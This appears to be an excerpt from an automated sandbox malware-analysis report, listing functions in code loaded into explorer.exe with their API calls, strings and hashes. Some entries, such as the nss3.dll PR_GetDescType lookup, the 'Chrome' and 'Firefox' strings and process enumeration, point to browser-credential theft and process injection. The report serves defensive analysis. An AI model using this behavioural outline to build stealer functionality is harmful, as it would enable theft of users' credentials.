                                                                                        • API ID: Pointerabort$DecodeEncode_set_abort_behavior
                                                                                        • String ID:
                                                                                        • API String ID: 2556904055-0
                                                                                        • Opcode ID: fec1bd2252bde516a5119e52db8b5bc8a0a86efe1fe1cbe4fe6ae57b67b9adc8
                                                                                        • Instruction ID: 15fe22ac48cadd95f233e9e097878b8fb62e63e8b857d149d368fbff99d8b184
                                                                                        • Opcode Fuzzy Hash: fec1bd2252bde516a5119e52db8b5bc8a0a86efe1fe1cbe4fe6ae57b67b9adc8
                                                                                        • Instruction Fuzzy Hash: 7FF05E38612B0DC1EE48ABA1E8593A82264FF89781FC04826868D47760CEBDB4958712
                                                                                        Function 10A67AC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50sleepprocessCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • Sleep.KERNEL32 ref: 10A67AE0
                                                                                          • Part of subcall function 10A583F0: HeapFree.KERNEL32 ref: 10A58427
                                                                                          • Part of subcall function 10A583F0: HeapDestroy.KERNEL32 ref: 10A58434
                                                                                          • Part of subcall function 10A59450: SHGetFolderPathW.SHELL32 ref: 10A594B5
                                                                                          • Part of subcall function 10A59450: lstrcatW.KERNEL32 ref: 10A594C5
                                                                                          • Part of subcall function 10A59450: lstrcatW.KERNEL32 ref: 10A594D3
                                                                                          • Part of subcall function 10A59450: CreateDirectoryW.KERNEL32 ref: 10A594DE
                                                                                          • Part of subcall function 10A59450: SetFileAttributesW.KERNEL32 ref: 10A594EC
                                                                                          • Part of subcall function 10A59450: lstrcatW.KERNEL32 ref: 10A594FC
                                                                                          • Part of subcall function 10A59450: lstrcatW.KERNEL32 ref: 10A5950A
                                                                                          • Part of subcall function 10A59450: lstrcatW.KERNEL32 ref: 10A5951A
                                                                                        • CreateProcessW.KERNEL32 ref: 10A67B7D
                                                                                        • CloseHandle.KERNEL32 ref: 10A67B88
                                                                                        • CloseHandle.KERNEL32 ref: 10A67B93
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3352603162.0000000010A50000.00000040.00000001.00020000.00000000.sdmp, Offset: 10A50000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A98000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A9B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_10a50000_explorer.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrcat$CloseCreateHandleHeap$AttributesDestroyDirectoryFileFolderFreePathProcessSleep
                                                                                        • String ID: h
                                                                                        • API String ID: 3093380506-2439710439
                                                                                        • Opcode ID: 3a820667e903cc7a424491bf0a3acffac0432e9db0cf12d8bba0984fd7faef9a
                                                                                        • Instruction ID: c0a62070e123a42492151328f7c873a6476bd6fb1ae6cfdc08f7fcca07069c89
                                                                                        • Opcode Fuzzy Hash: 3a820667e903cc7a424491bf0a3acffac0432e9db0cf12d8bba0984fd7faef9a
                                                                                        • Instruction Fuzzy Hash: EB212936618B8086E720DF65F49579EB3A4FBC8794F804129A68E46A28DF7CC049CB00
                                                                                        Function 10A5DE60 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 38COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 10A5DE72
                                                                                          • Part of subcall function 10A68350: _lock.LIBCMT ref: 10A68362
                                                                                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 10A5DEB8
                                                                                          • Part of subcall function 10A68B2C: setlocale.LIBCMT ref: 10A68B40
                                                                                          • Part of subcall function 10A68B2C: _Yarn.LIBCPMT ref: 10A68B5A
                                                                                          • Part of subcall function 10A68B2C: setlocale.LIBCMT ref: 10A68B69
                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 10A5DED7
                                                                                        • _CxxThrowException.LIBCMT ref: 10A5DEE8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3352603162.0000000010A50000.00000040.00000001.00020000.00000000.sdmp, Offset: 10A50000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A98000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A9B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_10a50000_explorer.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: setlocalestd::_$ExceptionLocinfo::_Locinfo_ctorLockitLockit::_ThrowYarn_lockstd::bad_exception::bad_exception
                                                                                        • String ID: bad locale name
                                                                                        • API String ID: 1861546320-1405518554
                                                                                        • Opcode ID: 2ee4f038ba5c01554f7996e6c9d4b59c6a6aa20390e6684f22015676108ee06b
                                                                                        • Instruction ID: 16a178c36dc1ffffec710a46059f61d29f9ba2cadf26924fed77c89ee462b165
                                                                                        • Opcode Fuzzy Hash: 2ee4f038ba5c01554f7996e6c9d4b59c6a6aa20390e6684f22015676108ee06b
                                                                                        • Instruction Fuzzy Hash: FCF062AA21094590CF24EF25EA911AC6335FFA4B84FC48431A74D4B968EF74D9CEC391
                                                                                        Function 10A79CAC Relevance: 7.6, APIs: 5, Instructions: 93COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3352603162.0000000010A50000.00000040.00000001.00020000.00000000.sdmp, Offset: 10A50000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A98000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A9B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_10a50000_explorer.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::__errno_isleadbyte_l
                                                                                        • String ID:
                                                                                        • API String ID: 2998201375-0
                                                                                        • Opcode ID: 7fd37892f316220aa19f00fcaf8dc51997011892845809b23b9cc2ff28337b72
                                                                                        • Instruction ID: 99bc236b02701d699cc44585b97361df92c26553409a219a76ba2b4df20d7810
                                                                                        • Opcode Fuzzy Hash: 7fd37892f316220aa19f00fcaf8dc51997011892845809b23b9cc2ff28337b72
                                                                                        • Instruction Fuzzy Hash: DA31B032314781CADB608F26E580769BBA5FB85FD4F15C227EB8957B5ADB3AC841C700
                                                                                        Function 10A664E0 Relevance: 7.6, APIs: 5, Instructions: 57processCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3352603162.0000000010A50000.00000040.00000001.00020000.00000000.sdmp, Offset: 10A50000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A98000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A9B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_10a50000_explorer.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Module32$Next$CreateCurrentFirstProcessSnapshotToolhelp32
                                                                                        • String ID:
                                                                                        • API String ID: 3721439000-0
                                                                                        • Opcode ID: bda1606e4ab0c299034f6951a9232dcc334564dbdc84e86ceabc3375b5e55141
                                                                                        • Instruction ID: 53a8d8ce5dab311bc95f0f8d364817c78c6abfa35d527206c5aab7164f0672ea
                                                                                        • Opcode Fuzzy Hash: bda1606e4ab0c299034f6951a9232dcc334564dbdc84e86ceabc3375b5e55141
                                                                                        • Instruction Fuzzy Hash: 0F11D22622478492DA50CB24E68536E6375FBC93D4F904722EA9D47A9CFF7CD908CB40
                                                                                        Function 08B89569 Relevance: 7.5, APIs: 5, Instructions: 37COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3342764004.0000000008B70000.00000040.00000001.00020000.00000000.sdmp, Offset: 08B70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_8b70000_explorer.jbxd
                                                                                        Similarity
                                                                                        • API ID: _getptd$_inconsistency$_getptd_noexit
                                                                                        • String ID:
                                                                                        • API String ID: 3003190580-0
                                                                                        • Opcode ID: e27d73e4e10e5f735ced9ff3aaf9c326269fd929ee4272090fc268d7effb348e
                                                                                        • Instruction ID: ae0362c585e5929f7d70e94f388fc7261284a4b147daf485018690810e56467b
                                                                                        • Opcode Fuzzy Hash: e27d73e4e10e5f735ced9ff3aaf9c326269fd929ee4272090fc268d7effb348e
                                                                                        • Instruction Fuzzy Hash: 77F08274628A09CFCFA9FB6CC0C0AB877E0FB8C242F4805EAD448C7346DA20A841CF15
                                                                                        Function 10A69C34 Relevance: 7.5, APIs: 5, Instructions: 25COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _getptd.LIBCMT ref: 10A69C41
                                                                                          • Part of subcall function 10A6E44C: _getptd_noexit.LIBCMT ref: 10A6E452
                                                                                          • Part of subcall function 10A6E44C: _amsg_exit.LIBCMT ref: 10A6E462
                                                                                        • _inconsistency.LIBCMT ref: 10A69C4F
                                                                                          • Part of subcall function 10A70C50: DecodePointer.KERNEL32 ref: 10A70C5B
                                                                                        • _getptd.LIBCMT ref: 10A69C54
                                                                                        • _inconsistency.LIBCMT ref: 10A69C70
                                                                                        • _getptd.LIBCMT ref: 10A69C80
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3352603162.0000000010A50000.00000040.00000001.00020000.00000000.sdmp, Offset: 10A50000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A98000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A9B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_10a50000_explorer.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _getptd$_inconsistency$DecodePointer_amsg_exit_getptd_noexit
                                                                                        • String ID:
                                                                                        • API String ID: 3669027769-0
                                                                                        • Opcode ID: e27d73e4e10e5f735ced9ff3aaf9c326269fd929ee4272090fc268d7effb348e
                                                                                        • Instruction ID: 63ee132d02015d53f50f45e6ec4feb8be75b158ce7ef3e24da677ce11e836329
                                                                                        • Opcode Fuzzy Hash: e27d73e4e10e5f735ced9ff3aaf9c326269fd929ee4272090fc268d7effb348e
                                                                                        • Instruction Fuzzy Hash: A6E0653A305680C4DB519B61E2851ED63F8E748BC0F1DD131FB454F205DE21D4A08356
                                                                                        Function 08B95EA1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 96COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _errno.LIBCMT ref: 08B95EBA
                                                                                          • Part of subcall function 08B8ACA5: _getptd_noexit.LIBCMT ref: 08B8ACA9
                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 08B95EC6
                                                                                        • _errno.LIBCMT ref: 08B95EED
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3342764004.0000000008B70000.00000040.00000001.00020000.00000000.sdmp, Offset: 08B70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_8b70000_explorer.jbxd
                                                                                        Similarity
                                                                                        • API ID: _errno$_getptd_noexit_invalid_parameter_noinfo
                                                                                        • String ID: 1
                                                                                        • API String ID: 28428206-2212294583
                                                                                        • Opcode ID: 27def2ce63ea5164f1b389b27a4df7c0dd5113023cec360ec6b6788ed5407055
                                                                                        • Instruction ID: 88253d11d7c1f682a59226519603009733486b9364232b3d8c003e47e0eda63c
                                                                                        • Opcode Fuzzy Hash: 27def2ce63ea5164f1b389b27a4df7c0dd5113023cec360ec6b6788ed5407055
                                                                                        • Instruction Fuzzy Hash: 7B21F820669EC8CFEB276B3C48843353AD5EB56257F1841FDC4C6CB256D965C8028311
                                                                                        Function 10A7AFFE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 10A69C34: _getptd.LIBCMT ref: 10A69C41
                                                                                          • Part of subcall function 10A69C34: _inconsistency.LIBCMT ref: 10A69C4F
                                                                                          • Part of subcall function 10A69C34: _getptd.LIBCMT ref: 10A69C54
                                                                                          • Part of subcall function 10A69C34: _inconsistency.LIBCMT ref: 10A69C70
                                                                                        • __DestructExceptionObject.LIBCMT ref: 10A7B04B
                                                                                        • _getptd.LIBCMT ref: 10A7B051
                                                                                        • _getptd.LIBCMT ref: 10A7B064
                                                                                          • Part of subcall function 10A69CC4: _getptd.LIBCMT ref: 10A69CCD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3352603162.0000000010A50000.00000040.00000001.00020000.00000000.sdmp, Offset: 10A50000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A98000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A9B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_10a50000_explorer.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _getptd$_inconsistency$DestructExceptionObject
                                                                                        • String ID: csm
                                                                                        • API String ID: 2821275340-1018135373
                                                                                        • Opcode ID: 04ef78a60891ed58f320d84018ed0530da5b37ca76eb9e364ff0eb7c92fe3229
                                                                                        • Instruction ID: 42b2bd9c52f7843f6714cb30f43270d8e3df7ab509b663c1e1a930cc345fc399
                                                                                        • Opcode Fuzzy Hash: 04ef78a60891ed58f320d84018ed0530da5b37ca76eb9e364ff0eb7c92fe3229
                                                                                        • Instruction Fuzzy Hash: 44F03C6625168289CB20DF31D8857AD33B8EB49B99F499031EF5E4BB05DE32D8C6C341
                                                                                        Function 10A68D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 30COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _callnewh.LIBCMT ref: 10A68D5E
                                                                                        • malloc.LIBCMT ref: 10A68D6A
                                                                                          • Part of subcall function 10A696CC: _FF_MSGBANNER.LIBCMT ref: 10A696FC
                                                                                          • Part of subcall function 10A696CC: _NMSG_WRITE.LIBCMT ref: 10A69706
                                                                                          • Part of subcall function 10A696CC: HeapAlloc.KERNEL32 ref: 10A69721
                                                                                          • Part of subcall function 10A696CC: _callnewh.LIBCMT ref: 10A6973A
                                                                                          • Part of subcall function 10A696CC: _errno.LIBCMT ref: 10A69745
                                                                                          • Part of subcall function 10A696CC: _errno.LIBCMT ref: 10A69750
                                                                                        • _CxxThrowException.LIBCMT ref: 10A68DB3
                                                                                          • Part of subcall function 10A6978C: RtlPcToFileHeader.NTDLL ref: 10A6981B
                                                                                          • Part of subcall function 10A6978C: RaiseException.KERNEL32 ref: 10A6985A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3352603162.0000000010A50000.00000040.00000001.00020000.00000000.sdmp, Offset: 10A50000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A98000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A9B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_10a50000_explorer.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Exception_callnewh_errno$AllocFileHeaderHeapRaiseThrowmalloc
                                                                                        • String ID: bad allocation
                                                                                        • API String ID: 1214304046-2104205924
                                                                                        • Opcode ID: cf9a3820587bab25b35abc0e452bb83a61c45a7a1915c4eae950822f45603846
                                                                                        • Instruction ID: 182fcfb06d5aba842c8647eeb997fcd2e371ef38a2124ba4e38c21799b59fafe
                                                                                        • Opcode Fuzzy Hash: cf9a3820587bab25b35abc0e452bb83a61c45a7a1915c4eae950822f45603846
                                                                                        • Instruction Fuzzy Hash: B3F0BEB9600B0AC0DE24CB50A0003956368FB98388F844922AA8D0B7A4EE7CD245CB01
                                                                                        Function 10A66650 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 22libraryloaderCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 10A666E0: RtlInitializeCriticalSection.NTDLL ref: 10A66711
                                                                                          • Part of subcall function 10A666E0: RtlInitializeCriticalSection.NTDLL ref: 10A6671E
                                                                                        • LoadLibraryA.KERNEL32 ref: 10A6666A
                                                                                        • GetProcAddress.KERNEL32 ref: 10A6667A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3352603162.0000000010A50000.00000040.00000001.00020000.00000000.sdmp, Offset: 10A50000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A98000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A9B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_10a50000_explorer.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CriticalInitializeSection$AddressLibraryLoadProc
                                                                                        • String ID: PR_GetDescType$nss3.dll
                                                                                        • API String ID: 1327063136-2530758152
                                                                                        • Opcode ID: f716216c2dc700c861f7446060af0c8469fbce2ce4d372eb788502e22ba554cf
                                                                                        • Instruction ID: 24c6363ee06411d9778d6790598f9d37d4b271379feb5b88f714c063b82264ea
                                                                                        • Opcode Fuzzy Hash: f716216c2dc700c861f7446060af0c8469fbce2ce4d372eb788502e22ba554cf
                                                                                        • Instruction Fuzzy Hash: B0F0AF78601B0A90EB05DF51E9953D93360FF4978DFC0801AD88953224DEBDE2C9C383
                                                                                        Function 10A666E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 14COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 10A58380: HeapCreate.KERNEL32 ref: 10A5839D
                                                                                          • Part of subcall function 10A67DD0: free.MSVCRT ref: 10A67DFE
                                                                                          • Part of subcall function 10A67DD0: Sleep.KERNEL32 ref: 10A67E15
                                                                                        • RtlInitializeCriticalSection.NTDLL ref: 10A66711
                                                                                        • RtlInitializeCriticalSection.NTDLL ref: 10A6671E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3352603162.0000000010A50000.00000040.00000001.00020000.00000000.sdmp, Offset: 10A50000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A98000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A9B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_10a50000_explorer.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CriticalInitializeSection$CreateHeapSleepfree
                                                                                        • String ID: Chrome$Firefox
                                                                                        • API String ID: 3233720727-2335468407
                                                                                        • Opcode ID: 0d3d46abbd83dfe590c2d1bb7bbd54f9bcf6c2aeac67eaeec3f6c303d37a2cde
                                                                                        • Instruction ID: 34b746275bc792f3fb373aaee46d36e48c79bc3af397d01ac1daa1ae22b939be
                                                                                        • Opcode Fuzzy Hash: 0d3d46abbd83dfe590c2d1bb7bbd54f9bcf6c2aeac67eaeec3f6c303d37a2cde
                                                                                        • Instruction Fuzzy Hash: 4BE0FE39B21B4196EA00EB14FC957E83764BF94799FC00115D48D46670EFB882D98BA6
                                                                                        Function 10A5F350 Relevance: 6.3, APIs: 5, Instructions: 41stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3352603162.0000000010A50000.00000040.00000001.00020000.00000000.sdmp, Offset: 10A50000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A98000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A9B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_10a50000_explorer.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrlenmallocmemcpy
                                                                                        • String ID:
                                                                                        • API String ID: 1128592954-0
                                                                                        • Opcode ID: ce44c2af02d94c40fc662e9a592eea0893846532a55e6e3cd8603df8462ac1df
                                                                                        • Instruction ID: 6c0b907d9accc6bf2b83d3300e46c4206a1e5d09f77faa71ba20b3637fa6943c
                                                                                        • Opcode Fuzzy Hash: ce44c2af02d94c40fc662e9a592eea0893846532a55e6e3cd8603df8462ac1df
                                                                                        • Instruction Fuzzy Hash: 3501D12671A78086EA948B17B94476AA2A0FB8CFD4F485030EE9E47B19EF3CD4858700
                                                                                        Function 10A54800 Relevance: 6.2, APIs: 4, Instructions: 195stringCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3352603162.0000000010A50000.00000040.00000001.00020000.00000000.sdmp, Offset: 10A50000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A98000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A9B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_10a50000_explorer.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _errno$isxdigitstrtol
                                                                                        • String ID:
                                                                                        • API String ID: 1632192098-0
                                                                                        • Opcode ID: 8a87e1b90b6231925026473331d16d0a0d19ed690a8e64018892fdd3084fb47b
                                                                                        • Instruction ID: 96182da9d311775094a0c8eeb88bcd1447e13234c923cb0c8352c57d8105de80
                                                                                        • Opcode Fuzzy Hash: 8a87e1b90b6231925026473331d16d0a0d19ed690a8e64018892fdd3084fb47b
                                                                                        • Instruction Fuzzy Hash: 84612432348BC08AEB918B21E85439A7BA0F386BCCF965215DF8A07791DF3DC488D305
                                                                                        Function 08B7CBC5 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 08B7CBDE
                                                                                          • Part of subcall function 08B7E4F5: std::_Lockit::_Lockit.LIBCPMT ref: 08B7E50B
                                                                                        • std::_Facet_Register.LIBCPMT ref: 08B7CC43
                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 08B7CC71
                                                                                        • _CxxThrowException.LIBCMT ref: 08B7CC82
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3342764004.0000000008B70000.00000040.00000001.00020000.00000000.sdmp, Offset: 08B70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_8b70000_explorer.jbxd
                                                                                        Similarity
                                                                                        • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrowstd::bad_exception::bad_exception
                                                                                        • String ID:
                                                                                        • API String ID: 784803821-0
                                                                                        • Opcode ID: d18575c936f708add1e7747410591034e242fc3e673200c653cbe787150549b3
                                                                                        • Instruction ID: 9860534e58434450c9e5eabffd557cc00bf610c0f6b705b0fe413ec68a842fd7
                                                                                        • Opcode Fuzzy Hash: d18575c936f708add1e7747410591034e242fc3e673200c653cbe787150549b3
                                                                                        • Instruction Fuzzy Hash: 25119335218F4C8F8B55FB2CC49466E7BE1FBA8302B5046AEA05BC3364DE74D905CB81
                                                                                        Function 08B7CC95 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 08B7CCAE
                                                                                          • Part of subcall function 08B7E4F5: std::_Lockit::_Lockit.LIBCPMT ref: 08B7E50B
                                                                                        • std::_Facet_Register.LIBCPMT ref: 08B7CD13
                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 08B7CD41
                                                                                        • _CxxThrowException.LIBCMT ref: 08B7CD52
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3342764004.0000000008B70000.00000040.00000001.00020000.00000000.sdmp, Offset: 08B70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_8b70000_explorer.jbxd
                                                                                        Similarity
                                                                                        • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrowstd::bad_exception::bad_exception
                                                                                        • String ID:
                                                                                        • API String ID: 784803821-0
                                                                                        • Opcode ID: 588dbd4c3485aeaeb49cd1e4237764da046df76d033139a9bcd38caf2fecdc26
                                                                                        • Instruction ID: 71c01a8c9fc50e325d2abce212206ae856403e0eefb4115887c861b5db07763a
                                                                                        • Opcode Fuzzy Hash: 588dbd4c3485aeaeb49cd1e4237764da046df76d033139a9bcd38caf2fecdc26
                                                                                        • Instruction Fuzzy Hash: 09118135218F4C8F8B55FB2CC49466A7BE1FBA8301B5046AE905AC3368DF74D905CB82
                                                                                        Function 08B8C781 Relevance: 6.1, APIs: 4, Instructions: 64COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _IsNonwritableInCurrentImage.LIBCMT ref: 08B8C79E
                                                                                          • Part of subcall function 08B93785: _FindPESection.LIBCMT ref: 08B937AE
                                                                                        • _initp_misc_cfltcvt_tab.LIBCMT ref: 08B8C7AF
                                                                                        • _initterm_e.LIBCMT ref: 08B8C7C2
                                                                                        • _IsNonwritableInCurrentImage.LIBCMT ref: 08B8C80B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3342764004.0000000008B70000.00000040.00000001.00020000.00000000.sdmp, Offset: 08B70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_8b70000_explorer.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentImageNonwritable$FindSection_initp_misc_cfltcvt_tab_initterm_e
                                                                                        • String ID:
                                                                                        • API String ID: 1991439119-0
                                                                                        • Opcode ID: 82da233bd22393f251cdd9dcfc228ec0faa1151005387e53682ccfef2511958d
                                                                                        • Instruction ID: ae584a19f0c30aaca0f8eb91163897bb04ce12bb809ba62d04954d3c2993e396
                                                                                        • Opcode Fuzzy Hash: 82da233bd22393f251cdd9dcfc228ec0faa1151005387e53682ccfef2511958d
                                                                                        • Instruction Fuzzy Hash: D711E575150A0ACFE765FF24ECA86B63BA1FB48346F44457AD403C2174EF7C8944CAA1
                                                                                        Function 10A52E00 Relevance: 6.1, APIs: 4, Instructions: 51processCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3352603162.0000000010A50000.00000040.00000001.00020000.00000000.sdmp, Offset: 10A50000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A98000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A9B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_10a50000_explorer.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Process32$Next$CreateFirstSnapshotToolhelp32
                                                                                        • String ID:
                                                                                        • API String ID: 1264244614-0
                                                                                        • Opcode ID: 80bb5765f9a2a165ef4c7c0d5d44b71313af7502d3f64ea6c40ec16e409fcc13
                                                                                        • Instruction ID: e943772987c86865e4e6ef781a321d3a03186d68ea2f1e5aa83893966441d217
                                                                                        • Opcode Fuzzy Hash: 80bb5765f9a2a165ef4c7c0d5d44b71313af7502d3f64ea6c40ec16e409fcc13
                                                                                        • Instruction Fuzzy Hash: DA11902631468092DB60CB21EA523AE7771FBC97D4FC44621FA9D47698EF3CD609CB00
                                                                                        Function 10A54BDC Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 40stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3352603162.0000000010A50000.00000040.00000001.00020000.00000000.sdmp, Offset: 10A50000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A98000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A9B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_10a50000_explorer.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: strncmp
                                                                                        • String ID: false$true
                                                                                        • API String ID: 1114863663-2658103896
